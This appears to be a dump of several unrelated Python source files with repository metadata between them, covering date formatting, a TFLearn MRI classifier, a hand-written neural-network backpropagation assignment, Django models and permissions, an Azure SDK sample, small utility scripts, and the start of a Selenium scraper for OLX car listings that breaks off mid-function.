return self.g()
return '%s:%s' % (self.g(), self.i())
def g(self):
"Hour, 12-hour format without leading zeros; i.e. '1' to '12'"
if self.data.hour == 0:
return 12
if self.data.hour > 12:
return self.data.hour - 12
return self.data.hour
def G(self):
"Hour, 24-hour format without leading zeros; i.e. '0' to '23'"
return self.data.hour
def h(self):
"Hour, 12-hour format; i.e. '01' to '12'"
return '%02d' % self.g()
def H(self):
"Hour, 24-hour format; i.e. '00' to '23'"
return '%02d' % self.G()
def i(self):
"Minutes; i.e. '00' to '59'"
return '%02d' % self.data.minute
def P(self):
"""
Time, in 12-hour hours, minutes and 'a.m.'/'p.m.', with minutes left off
if they're zero and the strings 'midnight' and 'noon' if appropriate.
Examples: '1 a.m.', '1:30 p.m.', 'midnight', 'noon', '12:30 p.m.'
Proprietary extension.
"""
if self.data.minute == 0 and self.data.hour == 0:
return _('midnight')
if self.data.minute == 0 and self.data.hour == 12:
return _('noon')
return '%s %s' % (self.f(), self.a())
def s(self):
"Seconds; i.e. '00' to '59'"
return '%02d' % self.data.second
def u(self):
"Microseconds"
return self.data.microsecond
class DateFormat(TimeFormat):
year_days = [None, 0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334]
def __init__(self, dt):
# Accepts either a datetime or date object.
self.data = dt
self.timezone = None
if isinstance(dt, datetime.datetime):
if is_naive(dt):
self.timezone = LocalTimezone(dt)
else:
self.timezone = dt.tzinfo
def b(self):
"Month, textual, 3 letters, lowercase; e.g. 'jan'"
return MONTHS_3[self.data.month]
def c(self):
"""
ISO 8601 Format
Example : '2008-01-02T10:30:00.000123'
"""
return self.data.isoformat()
def d(self):
"Day of the month, 2 digits with leading zeros; i.e. '01' to '31'"
return '%02d' % self.data.day
def D(self):
"Day of the week, textual, 3 letters; e.g. 'Fri'"
return WEEKDAYS_ABBR[self.data.weekday()]
def e(self):
"Timezone name if available"
try:
if hasattr(self.data, 'tzinfo') and self.data.tzinfo:
# Have to use tzinfo.tzname and not datetime.tzname
# because datatime.tzname does not expect Unicode
return self.data.tzinfo.tzname(self.data) or ""
except NotImplementedError:
pass
return ""
def E(self):
"Alternative month names as required by some locales. Proprietary extension."
return MONTHS_ALT[self.data.month]
def F(self):
"Month, textual, long; e.g. 'January'"
return MONTHS[self.data.month]
def I(self):
"'1' if Daylight Savings Time, '0' otherwise."
if self.timezone and self.timezone.dst(self.data):
return '1'
else:
return '0'
def j(self):
"Day of the month without leading zeros; i.e. '1' to '31'"
return self.data.day
def l(self):
"Day of the week, textual, long; e.g. 'Friday'"
return WEEKDAYS[self.data.weekday()]
def L(self):
"Boolean for whether it is a leap year; i.e. True or False"
return calendar.isleap(self.data.year)
def m(self):
"Month; i.e. '01' to '12'"
return '%02d' % self.data.month
def M(self):
"Month, textual, 3 letters; e.g. 'Jan'"
return MONTHS_3[self.data.month].title()
def n(self):
"Month without leading zeros; i.e. '1' to '12'"
return self.data.month
def N(self):
"Month abbreviation in Associated Press style. Proprietary extension."
return MONTHS_AP[self.data.month]
def o(self):
"ISO 8601 year number matching the ISO week number (W)"
return self.data.isocalendar()[0]
def O(self):
"Difference to Greenwich time in hours; e.g. '+0200', '-0430'"
seconds = self.Z()
sign = '-' if seconds < 0 else '+'
seconds = abs(seconds)
return "%s%02d%02d" % (sign, seconds // 3600, (seconds // 60) % 60)
def r(self):
"RFC 2822 formatted date; e.g. 'Thu, 21 Dec 2000 16:01:07 +0200'"
return self.format('D, j M Y H:i:s O')
def S(self):
"English ordinal suffix for the day of the month, 2 characters; i.e. 'st', 'nd', 'rd' or 'th'"
if self.data.day in (11, 12, 13): # Special case
return 'th'
last = self.data.day % 10
if last == 1:
return 'st'
if last == 2:
return 'nd'
if last == 3:
return 'rd'
return 'th'
def t(self):
"Number of days in the given month; i.e. '28' to '31'"
return '%02d' % calendar.monthrange(self.data.year, self.data.month)[1]
def T(self):
"Time zone of this machine; e.g. 'EST' or 'MDT'"
name = self.timezone and self.timezone.tzname(self.data) or None
if name is None:
name = self.format('O')
return six.text_type(name)
def U(self):
"Seconds since the Unix epoch (January 1 1970 00:00:00 GMT)"
if isinstance(self.data, datetime.datetime) and is_aware(self.data):
return int(calendar.timegm(self.data.utctimetuple()))
else:
return int(time.mktime(self.data.timetuple()))
def w(self):
"Day of the week, numeric, i.e. '0' (Sunday) to '6' (Saturday)"
return (self.data.weekday() + 1) % 7
def W(self):
"ISO-8601 week number of year, weeks starting on Monday"
# Algorithm from http://www.personal.ecu.edu/mccartyr/ISOwdALG.txt
week_number = None
jan1_weekday = self.data.replace(month=1, day=1).weekday() + 1
weekday = self.data.weekday() + 1
day_of_year = self.z()
if day_of_year <= (8 - jan1_weekday) and jan1_weekday > 4:
if jan1_weekday == 5 or (jan1_weekday == 6 and calendar.isleap(self.data.year-1)):
week_number = 53
else:
week_number = 52
else:
if calendar.isleap(self.data.year):
i = 366
else:
i = 365
if (i - day_of_year) < (4 - weekday):
week_number = 1
else:
j = day_of_year + (7 - weekday) + (jan1_weekday - 1)
week_number = j // 7
if jan1_weekday > 4:
week_number -= 1
return week_number
def y(self):
"Year, 2 digits; e.g. '99'"
return six.text_type(self.data.year)[2:]
def Y(self):
"Year, 4 digits; e.g. '1999'"
return self.data.year
def z(self):
"Day of the year; i.e. '0' to '365'"
doy = self.year_days[self.data.month] + self.data.day
if self.L() and self.data.month > 2:
doy += 1
return doy
def Z(self):
"""
Time zone offset in seconds (i.e. '-43200' to '43200'). The offset for
timezones west of UTC is always negative, and for those east of UTC is
always positive.
"""
if not self.timezone:
return 0
offset = self.timezone.utcoffset(self.data)
# `offset` is a datetime.timedelta. For negative values (to the west of
# UTC) only days can be negative (days=-1) and seconds are always
# positive. e.g. UTC-1 -> timedelta(days=-1, seconds=82800, microseconds=0)
# Positive offsets have days=0
return offset.days * 86400 + offset.seconds
def format(value, format_string):
"Convenience function"
df = DateFormat(value)
return df.format(format_string)
def time_format(value, format_string):
"Convenience function"
tf = TimeFormat(value)
return tf.format(format_string)
| [
"[email protected]"
] | |
46ad0d5fbbffd25af388851a3e9e9c76744a7ff7 | 260f8c791b853cc14c6b432a1fc917bbfaec9337 | /train.py | ab8d5ecaaa155c77c031d13e66e1c6cdd39f8466 | [] | no_license | sambd86/Brain-MRI-Classification | 842922c68394a273471329c0cbada1136abba18c | 574aa2c2a405c69557035bfc63d97d9e8724e87a | refs/heads/master | 2020-08-07T07:57:22.152591 | 2019-02-15T18:40:47 | 2019-02-15T18:40:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,624 | py | import numpy as np
IMG_PX_SIZE = 80
HM_SLICES = 16
LR = 1e-3
MODEL_NAME = 'boldvst1w-{}-{}.model.tflearn'.format(LR, '2conv')
train_data = np.load('muchdata-80-80-16.npy')
import tflearn
from tflearn.layers.conv import conv_2d, max_pool_2d
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.estimator import regression
convnet = input_data(shape=[None,IMG_PX_SIZE,IMG_PX_SIZE,1], name='input')
convnet = conv_2d(convnet, 32, 2, activation='relu')
convnet = max_pool_2d(convnet,2)
convnet = conv_2d(convnet, 64, 2, activation='relu')
convnet = max_pool_2d(convnet,2)
convnet = conv_2d(convnet, 32, 2, activation='relu')
convnet = max_pool_2d(convnet,2)
convnet = conv_2d(convnet, 64, 2, activation='relu')
convnet = max_pool_2d(convnet,2)
convnet = fully_connected(convnet, 1024, activation='relu')
convnet = dropout(convnet, 0.8)
convnet = fully_connected(convnet, 2, activation='softmax')
convnet = regression(convnet, optimizer='adam', learning_rate=LR,loss='categorical_crossentropy', name='targets')
model = tflearn.DNN(convnet, tensorboard_dir='log')
train = train_data[:-400]
test = train_data[-400:]
X = np.array([i[0] for i in train]).reshape(-1, IMG_PX_SIZE,IMG_PX_SIZE, 1)
Y = [i[1] for i in train]
test_x = np.array([i[0] for i in test]).reshape(-1, IMG_PX_SIZE,IMG_PX_SIZE, 1)
test_y = [i[1] for i in test]
model.fit({'input':X},{'targets': Y}, n_epoch=3, validation_set=({'input':test_x},{'targets':test_y}),
snapshot_step=500, show_metric=True, run_id=MODEL_NAME)
model.save('model.tflearn')
| [
"[email protected]"
] | |
a592272c84f6a3a7394a8e55e211e79f8bdeb7e8 | 2bb1b960054b1655918b9a9255c455ca45650e26 | /Project4b/NeuralNet.py | e4169f157745102770cba3bdffc1d03c732f4012 | [] | no_license | jluo80/CS3600-Introduction-to-Artificial-Intelligent | 0a880b069544ce44936cc0c9007836539b722ae0 | 6d1f7d0257e39518f61c439776bff9ac6bfbc88f | refs/heads/master | 2021-01-20T04:54:52.010638 | 2017-04-28T23:20:26 | 2017-04-28T23:20:26 | 89,749,940 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 15,976 | py | import copy
import sys
from datetime import datetime
from math import exp
from random import random, randint, choice
class Perceptron(object):
"""
Class to represent a single Perceptron in the net.
"""
def __init__(self, inSize=1, weights=None):
self.inSize = inSize+1#number of perceptrons feeding into this one; add one for bias
if weights is None:
#weights of previous layers into this one, random if passed in as None
self.weights = [1.0]*self.inSize
self.setRandomWeights()
else:
self.weights = weights
def getWeightedSum(self, inActs):
"""
Returns the sum of the input weighted by the weights.
Inputs:
inActs (list<float/int>): input values, same as length as inSize
Returns:
float
The weighted sum
"""
return sum([inAct*inWt for inAct,inWt in zip(inActs,self.weights)])
def sigmoid(self, value):
"""
Return the value of a sigmoid function.
Args:
value (float): the value to get sigmoid for
Returns:
float
The output of the sigmoid function parametrized by
the value.
"""
"""YOUR CODE"""
# print value
return 1.0 / (1 + exp(-value))
def sigmoidActivation(self, inActs):
"""
Returns the activation value of this Perceptron with the given input.
Same as g(z) in book.
Remember to add 1 to the start of inActs for the bias input.
Inputs:
inActs (list<float/int>): input values, not including bias
Returns:
float
The value of the sigmoid of the weighted input
"""
"""YOUR CODE"""
# Remember to add 1 to the start of inActs for the bias input.
inActs = [1.0] + inActs
# print len(inActs)
output = self.sigmoid(self.getWeightedSum(inActs))
return output
def sigmoidDeriv(self, value):
"""
Return the value of the derivative of a sigmoid function.
Args:
value (float): the value to get sigmoid for
Returns:
float
The output of the derivative of a sigmoid function
parametrized by the value.
"""
"""YOUR CODE"""
return self.sigmoid(value) * (1 - self.sigmoid(value))
def sigmoidActivationDeriv(self, inActs):
"""
Returns the derivative of the activation of this Perceptron with the
given input. Same as g'(z) in book (note that this is not rounded.
Remember to add 1 to the start of inActs for the bias input.
Inputs:
inActs (list<float/int>): input values, not including bias
Returns:
int
The derivative of the sigmoid of the weighted input
"""
"""YOUR CODE"""
inActs = [1.0] + inActs
output = self.sigmoidDeriv(self.getWeightedSum(inActs))
return output
def updateWeights(self, inActs, alpha, delta):
"""
Updates the weights for this Perceptron given the input delta.
Remember to add 1 to the start of inActs for the bias input.
Inputs:
inActs (list<float/int>): input values, not including bias
alpha (float): The learning rate
delta (float): If this is an output, then g'(z)*error
If this is a hidden unit, then the as defined-
g'(z)*sum over weight*delta for the next layer
Returns:
float
Return the total modification of all the weights (sum of each abs(modification))
"""
totalModification = 0
"""YOUR CODE"""
inActs = [1.0] + inActs
for i in range(len(self.weights)):
weightChange = alpha * delta * inActs[i]
self.weights[i] += weightChange
totalModification += abs(weightChange)
return totalModification
def setRandomWeights(self):
"""
Generates random input weights that vary from -1.0 to 1.0
"""
for i in range(self.inSize):
self.weights[i] = (random() + .0001) * (choice([-1,1]))
def __str__(self):
""" toString """
outStr = ''
outStr += 'Perceptron with %d inputs\n'%self.inSize
outStr += 'Node input weights %s\n'%str(self.weights)
return outStr
class NeuralNet(object):
"""
Class to hold the net of perceptrons and implement functions for it.
"""
def __init__(self, layerSize):#default 3 layer, 1 percep per layer
"""
Initiates the NN with the given sizes.
Args:
layerSize (list<int>): the number of perceptrons in each layer
[16, 24, 10]: 16 inputs, 24 perceptron in first hidden layer, 10 outputs
"""
self.layerSize = layerSize #Holds number of inputs and percepetrons in each layer
self.outputLayer = []
self.numHiddenLayers = len(layerSize)-2
self.hiddenLayers = [[] for x in range(self.numHiddenLayers)]
self.numLayers = self.numHiddenLayers+1 # numer of hidden layers + number of output layers
#build hidden layer(s): one hidden layer contains 24 perceptrons
for h in range(self.numHiddenLayers):
for p in range(layerSize[h+1]):
percep = Perceptron(layerSize[h]) # num of perceps feeding into this one
self.hiddenLayers[h].append(percep)
#build output layer: output layer contains 10 perceptrons
for i in range(layerSize[-1]):
percep = Perceptron(layerSize[-2]) # num of perceps feeding into this one
self.outputLayer.append(percep)
#build layers list that holds all layers in order - use this structure
# to implement back propagation
self.layers = [self.hiddenLayers[h] for h in xrange(self.numHiddenLayers)] + [self.outputLayer]
def __str__(self):
"""toString"""
outStr = ''
outStr +='\n'
for hiddenIndex in range(self.numHiddenLayers):
outStr += '\nHidden Layer #%d'%hiddenIndex
for index in range(len(self.hiddenLayers[hiddenIndex])):
outStr += 'Percep #%d: %s'%(index,str(self.hiddenLayers[hiddenIndex][index]))
outStr +='\n'
for i in range(len(self.outputLayer)):
outStr += 'Output Percep #%d:%s'%(i,str(self.outputLayer[i]))
return outStr
def feedForward(self, inActs):
"""
Propagate input vector forward to calculate outputs.
Args:
inActs (list<float>): the input to the NN (an example)
Returns:
list<list<float/int>>
A list of lists. The first list is the input list, and the others are
lists of the output values of all perceptrons in each layer.
"""
"""YOUR CODE"""
# print self.layers[1][1] # two layers: one hidden layer(24 x 1), one output layer(10 x 1)
# print len(inActs) # one example: 16 x 1
outputs = [inActs]
for layer in self.layers:
outActs = []
for perceptron in layer:
outActs.append(perceptron.sigmoidActivation(inActs))
outputs.append(outActs)
inActs = outActs
return outputs # [[input inActs list 16 x 1], [output outActs list 24 x 1], [output final list 10 x 1]]
def backPropLearning(self, examples, alpha):
"""
Run a single iteration of backward propagation learning algorithm.
See the text and slides for pseudo code.
Args:
examples (list<tuple<list<float>,list<float>>>):
for each tuple first element is input(feature)"vector" (list)
second element is output "vector" (list)
alpha (float): the alpha to training with
Returns
tuple<float,float>
A tuple of averageError and averageWeightChange, to be used as stopping conditions.
averageError is the summed error^2/2 of all examples, divided by numExamples*numOutputs.
averageWeightChange is the summed absolute weight change of all perceptrons,
divided by the sum of their input sizes (the average weight change for a single perceptron).
"""
# print len(examples) # 2 x 1
# keep track of output
averageError = 0
averageWeightChange = 0
numWeights = 0
for example in examples:#for each example 16, 10
#keep track of deltas to use in weight change
# print example[1] # output vector
# print example[0] # input vector
deltas = [] # num of examples x num of output: 2 x 10
#Neural net output list
allLayerOutput = self.feedForward(example[0])
# print len(allLayerOutput[-1])
# print len(allLayerOutput[-2])
lastLayerOutput = allLayerOutput[-1]
#Empty output layer delta list
outDelta = [] # 10 x 1
#iterate through all output layer neurons: 10 x 1
for outputNum in xrange(len(example[1])):
gPrime = self.outputLayer[outputNum].sigmoidActivationDeriv(allLayerOutput[-2])
error = example[1][outputNum] - lastLayerOutput[outputNum] # expected - actual
delta = gPrime * error
averageError+=error*error/2
outDelta.append(delta)
deltas.append(outDelta)
"""
Backpropagate through all hidden layers, calculating and storing
the deltas for each perceptron layer.
"""
# print self.numHiddenLayers # 1
for layerNum in xrange(self.numHiddenLayers-1,-1,-1): # from the last hidden layer till the first layer
layer = self.layers[layerNum] # hidden layer + output layer
nextLayer = self.layers[layerNum+1]
hiddenDelta = []
#Iterate through all neurons in this layer
for neuronNum in xrange(len(layer)):
# layerNum = 0 which is the input layer, so basically, sigmoidActivationDeriv(previous layer output)
gPrime = layer[neuronNum].sigmoidActivationDeriv(allLayerOutput[layerNum])
weightedSum = 0.0
for neuronNumNext in xrange(len(nextLayer)):
weightedSum += nextLayer[neuronNumNext].weights[neuronNum + 1] * deltas[layerNum][neuronNumNext]
delta = gPrime * weightedSum
hiddenDelta.append(delta)
deltas = [hiddenDelta]+deltas
"""Get output of all layers"""
"""
Having aggregated all deltas, update the weights of the
hidden and output layers accordingly.
"""
for numLayer in xrange(0,self.numLayers):
layer = self.layers[numLayer]
for numNeuron in xrange(len(layer)):
weightMod = layer[numNeuron].updateWeights(allLayerOutput[numLayer], alpha, deltas[numLayer][numNeuron])
averageWeightChange += weightMod
numWeights += layer[numNeuron].inSize
#end for each example
#calculate final output
averageError /= (len(examples)*len(examples[0][1])) #number of examples x length of output vector
averageWeightChange/=(numWeights)
return averageError, averageWeightChange
def buildNeuralNet(examples, alpha=0.1, weightChangeThreshold = 0.00008, hiddenLayerList = [1], maxItr = sys.maxint, startNNet = None):
"""
Train a neural net for the given input.
Args:
examples (tuple<list<tuple<list,list>>,
list<tuple<list,list>>>): A tuple of training and test examples
alpha (float): the alpha to train with
weightChangeThreshold (float): The threshold to stop training at
maxItr (int): Maximum number of iterations to run
hiddenLayerList (list<int>): The list of numbers of Perceptrons
for the hidden layer(s).
startNNet (NeuralNet): A NeuralNet to train, or none if a new NeuralNet
can be trained from random weights.
Returns
tuple<NeuralNet,float>
A tuple of the trained Neural Network and the accuracy that it achieved
once the weight modification reached the threshold, or the iteration
exceeds the maximum iteration.
"""
examplesTrain,examplesTest = examples
numIn = len(examplesTrain[0][0])
numOut = len(examplesTest[0][1])
time = datetime.now().time()
if startNNet is not None:
hiddenLayerList = [len(layer) for layer in startNNet.hiddenLayers]
print "Starting training at time %s with %d inputs, %d outputs, %s hidden layers, size of training set %d, and size of test set %d"\
%(str(time),numIn,numOut,str(hiddenLayerList),len(examplesTrain),len(examplesTest))
layerList = [numIn]+hiddenLayerList+[numOut]
nnet = NeuralNet(layerList)
if startNNet is not None:
nnet = startNNet
"""
YOUR CODE
"""
iteration = 0
trainError = 0
weightMod = 0
weightChange = sys.maxint
while iteration < maxItr and weightChange > weightChangeThreshold:
trainError, weightChange = nnet.backPropLearning(examplesTrain, alpha)
iteration = iteration + 1
"""
Iterate for as long as it takes to reach weight modification threshold
"""
# if iteration % 10 == 0:
# print '! on iteration %d; training error %f and weight change %f'%(iteration,trainError,weightChange)
# else :
# print '.',
time = datetime.now().time()
print 'Finished after %d iterations at time %s with training error %f and weight change %f'%(iteration,str(time),trainError,weightMod)
"""
Get the accuracy of your Neural Network on the test examples.
For each test example, you should first feedforward to get the NN outputs. Then, round the list of outputs from the output layer of the neural net.
If the entire rounded list from the NN matches with the known list from the test example, then add to testCorrect, else add to testError.
"""
testError = 0
testCorrect = 0
testAccuracy=0.0 # num correct / num total
numTotal = len(examplesTest)
for feature, label in examplesTest:
# use updated weight to predict the output
predict = [round(output) for output in nnet.feedForward(feature)[-1]]
if predict == label:
testCorrect += 1
else:
testError += 1
testAccuracy = 1.0 * testCorrect / numTotal
print 'Feed Forward Test correctly classified %d, incorrectly classified %d, test percent error %f\n'%(testCorrect,testError,(1 - testAccuracy) * 100)
"""return something"""
return nnet, testAccuracy
| [
"[email protected]"
] | |
52ab1199935d944737191ee8695649293a30c578 | ac12fef34ba743c739c61745bdc47ef60b9c9a95 | /core/permissions.py | 05a48bc07a2d07ad41a033c368dbd431a1a479f0 | [] | no_license | learningnoobi/UserManagementApi | cc5efebc8939f6c70662424a989624371bc4dcb2 | 67a19f904e0a2d638c81d589ae5a90b9195f8185 | refs/heads/main | 2023-05-27T17:00:35.394679 | 2021-06-12T10:42:36 | 2021-06-12T10:42:36 | 373,291,017 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 665 | py | from rest_framework import permissions
from .serializers import UserSerializer,CurrentUserSerializer
class ViewPermissions(permissions.BasePermission):
def has_permission(self, request, view):
data = CurrentUserSerializer(request.user).data
if not data.get("role") is None:
view_access = any(p['name'] == 'view_' + view.permission_object for p in data['role']['permissions'])
edit_access = any(p['name'] == 'edit_' + view.permission_object for p in data['role']['permissions'])
if request.method == 'GET':
return view_access or edit_access
return edit_access | [
"[email protected]"
] | |
befa8fcb42b0ff630f187373b3a5359fd8258cb8 | a91f09527b64f18b30d7aeb761f6e5d97ed67f45 | /TheMain.py | 56db697bab6623fd10eb4139b63ae35aa57bd666 | [] | no_license | Michedev/TrainingForHashCode | 469a32214ca7327b39749dd3b2cf2fe75d5f7bc6 | 2ef5a7444dbc9ced0f2159e6cc0a78263df74dd9 | refs/heads/master | 2021-01-11T15:27:15.451692 | 2017-01-30T20:51:40 | 2017-01-30T20:51:40 | 80,348,276 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | from InputParser import InputParser
from Deliver import DeliveryGuy
theParser = InputParser()
theParser.loadInput("test.in")
theDeliveryGuy = DeliveryGuy()
theDeliveryGuy.start(theParser.drones, theParser.orders, theParser.warehouses, theParser.deadline)
print (theDeliveryGuy.commands) | [
"[email protected]"
] | |
038b53660861622923bdc0d10d6cac2b42de1207 | 428ea81730a7102cb3ede62d16d16ed79cab7905 | /Mundo_1/desafio035.py | 4686757b8ed5a1954ce48f2a4e43250cad243748 | [] | no_license | reinaldoboas/Curso_em_Video_Python | 290f5387bd70caf74c06b33cdb34d9b2809088c3 | 7c36b84df957721ff20019eb90fdabdd49acaa94 | refs/heads/master | 2020-11-27T06:59:24.683947 | 2020-06-10T13:49:09 | 2020-06-10T13:49:09 | 229,346,624 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 761 | py | ### Curso em Vídeo - Exercicio: desafio035.py
### Link: https://www.youtube.com/watch?v=NZiNphKkxhg&list=PLHz_AreHm4dm6wYOIW20Nyg12TAjmMGT-&index=36
### Desenvolva um programa que leia o comprimento de três retas e diga ao usuário se elas podem ou não formar um triângulo.
comp1 = float(input("Digite o primeiro comprimento: "))
comp2 = float(input("Digite o segundo comprimento: "))
comp3 = float(input("Digite o terceiro comprimento: "))
# Para formar um triângulo é necessário que cada um dos comprimentos sejam menores do que a soma dos outros dois.
if comp1 < comp2 + comp3 and comp2 < comp1 + comp3 and comp3 < comp2 + comp1:
print("Os segmentos podem formar um triângulo!")
else:
print("Os segmentos NÂO PODEM formar um triângulo!")
| [
"[email protected]"
] | |
c5ba88ddbf30f317b40371913a3a3022c5efaeb6 | 401f6332eebcb0f665aee236a1336d6bd30b39ac | /webportal/models.py | 4063c34edd97e1af73227b054438e3b78eabf1a6 | [] | no_license | rsribas/djangoapp | 6672e533f8ee9a1f3c54c617eca30d0d50c01045 | ed02dbe652edd1c396bc766ed0aa1b4f6121aae4 | refs/heads/master | 2021-01-20T21:45:45.844339 | 2017-08-29T17:47:44 | 2017-08-29T17:47:44 | 101,788,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 868 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
# Create your models here.
from django.contrib.auth.models import User
#import django_tables2 as tables
class Support(models.Model):
"""Abertura de Tickets para a o NOC"""
assunto = models.CharField(max_length=200)
descricao = models.TextField()
date_added = models.DateTimeField(auto_now_add=True)
def __str__(self):
"""Devolve representacao em string do modelo"""
return self.assunto
class Module(models.Model):
"""Modulos disponiveis da aplicacao"""
name = models.CharField(max_length=50)
description = models.CharField(max_length=200)
CHOICE = (('Y','Yes'),('N','No'))
builtin = models.CharField(max_length=1, choices=CHOICE, blank=True)
# user = models.ForeignKey(User)
def __str__(self):
"""Devolve representacao em string"""
return self.name
| [
"[email protected]"
] | |
3969fa2604803a4a5f5149a43be5f14967340d9d | be7949a09fa8526299b42c4c27adbe72d59d2201 | /cnns/nnlib/test/python_tests/parse_args.py | b460897c20a5fa8622862b59fca874d6026418e8 | [
"Apache-2.0"
] | permissive | adam-dziedzic/bandlimited-cnns | 375b5cccc7ab0f23d2fbdec4dead3bf81019f0b4 | 81aaa27f1dd9ea3d7d62b661dac40cac6c1ef77a | refs/heads/master | 2022-11-25T05:40:55.044920 | 2020-06-07T16:14:34 | 2020-06-07T16:14:34 | 125,884,603 | 17 | 5 | Apache-2.0 | 2022-11-21T21:01:46 | 2018-03-19T16:02:57 | Jupyter Notebook | UTF-8 | Python | false | false | 674 | py | import argparse
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('integers', metavar='N', type=int, nargs='+',
help='an integer for the accumulator')
parser.add_argument('--sum', dest='accumulate', action='store_const',
const=sum, default=max,
help='sum the integers (default: find the max)')
parser.add_argument("-e", "--epochs", help="for how many epochs to run", type=int, )
args = parser.parse_args()
print("args.integers: ", args.integers)
print("size of args.integers: ", len(args.integers))
print("args.epochs: ", args.epochs)
print(args.accumulate(args.integers))
| [
"[email protected]"
] | |
10e80daf8d1343d953d869670b653a0a5e1f970b | 82c9b71a53a37486aba79c4131caa75fa85f4e19 | /Localization/convert_img.py | be6f75f425d40c01871603c8b40c01e316c07244 | [] | no_license | diamondspark/LVSegmentation | b0750e2db8a5a8adc56a32b138eccd700ee21c5a | f0d23abeef4efd52b14359d7f1b045f6dba8d461 | refs/heads/master | 2020-12-02T06:45:42.309098 | 2017-08-03T23:20:56 | 2017-08-03T23:20:56 | 96,894,014 | 0 | 0 | null | 2017-07-11T16:23:51 | 2017-07-11T13:07:12 | Python | UTF-8 | Python | false | false | 522 | py | from image import readImage
import os
src = '/data/gabriel/LVseg/dataset/Training'
import scipy.misc
#for i in os.listdir(src):
# if(i=='Training'):
for j in os.listdir(src):
for k in os.listdir(src+'/'+j):
if '.dcm' in k:
I = readImage(src+'/'+j+'/'+k,'dicom')
scipy.misc.imsave('/data/gabriel/LVseg/dataset_img/img/'+'/Training/'+k[:k.find('.')-1]+'.png',I)
elif '.png' in k:
I = readImage(src+'/'+j+'/'+k,'png')
scipy.misc.imsave('/data/gabriel/LVseg/dataset_img/label/'+'Training/'+k,I)
| [
"[email protected]"
] | |
6177d284bd6e936bcf5790431d5c49eb42f90d68 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/network/azure-mgmt-network/generated_samples/express_route_circuit_peering_stats.py | f9ffa9854ccf5d162867be4267f96a7b4ecc3553 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,601 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.network import NetworkManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-network
# USAGE
python express_route_circuit_peering_stats.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = NetworkManagementClient(
credential=DefaultAzureCredential(),
subscription_id="subid",
)
response = client.express_route_circuits.get_peering_stats(
resource_group_name="rg1",
circuit_name="circuitName",
peering_name="peeringName",
)
print(response)
# x-ms-original-file: specification/network/resource-manager/Microsoft.Network/stable/2023-04-01/examples/ExpressRouteCircuitPeeringStats.json
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
a140d9e849a9ad7f7ce35a8ba56f519ec5b24da9 | 56518dd10339075dffc3d73058576b31ab1a2287 | /mystatusapp/apps.py | 4d8984bf9128f8098fa4d50e8f42a85b4d1133ef | [] | no_license | mori-0903/make_mystatus | 51349870f2bfdcb41857fb101ab1621ecd4ab640 | e50345d306036ba8cd30ddc65529edecb144b6e2 | refs/heads/main | 2023-05-31T14:39:10.360159 | 2021-06-28T12:00:42 | 2021-06-28T12:00:42 | 380,733,520 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 154 | py | from django.apps import AppConfig
class MystatusappConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'mystatusapp'
| [
"[email protected]"
] | |
f4bda8b4f5f2409aa4d584318295eff1a71ccdd5 | 9ab1139119e0a942b90286a32179b0b37b9f2bd4 | /main.py | 9fe9b7d8fefe491e34d8c2a2fefdbdab44493dda | [] | no_license | carlsec/olx_cars | 3a15a24f2b89640a6b95e93a02bfad6d574afca7 | 9ac706b3ff46a38e9ede5afa66a58d67d1a63570 | refs/heads/main | 2023-05-30T16:29:50.898474 | 2021-06-21T02:20:40 | 2021-06-21T02:20:40 | 378,564,614 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,627 | py | from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from bs4 import BeautifulSoup
import pandas as pd
from tqdm import tqdm
import requests
import numpy as np
import datetime
import time
import os
list_fuels = ['Gasolina', 'Flex', 'Diesel', 'Gás Natural', 'Etanol']
list_types = ['SUV', 'Sedã', 'Passeio', 'Hatch', 'Pick-up', 'Van/Utilitário', 'Conversível']
list_poten = ['1.8', '1.6', '1.0','1.7', '2.0 - 2.9', '1.5', '1.4', '1.3', '4.0 ou mais']
list_directions = ['Hidráulica', 'Elétrica', 'Mecânica']
list_changes = ['Manual', 'Automático', 'Semi-Automático']
list_colors = ['Branco', 'Prata', 'Verde', 'Azul', 'Amarelo', 'Vermelho', 'Preto', 'Cinza']
list_doors = ['4 portas', '2 portas']
def search_links():
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument("--headless") #2
chrome_options.add_argument("--no-sandbox") #2
driver = webdriver.Chrome(executable_path='chromedriver', options=chrome_options)
links = []
for pagina in tqdm(range(1)):
url = 'https://sp.olx.com.br/autos-e-pecas/carros-vans-e-utilitarios?o={}&sf=1'.format(pagina)
response = driver.get(url=url)
html = driver.page_source
soup = BeautifulSoup(html, 'html.parser')
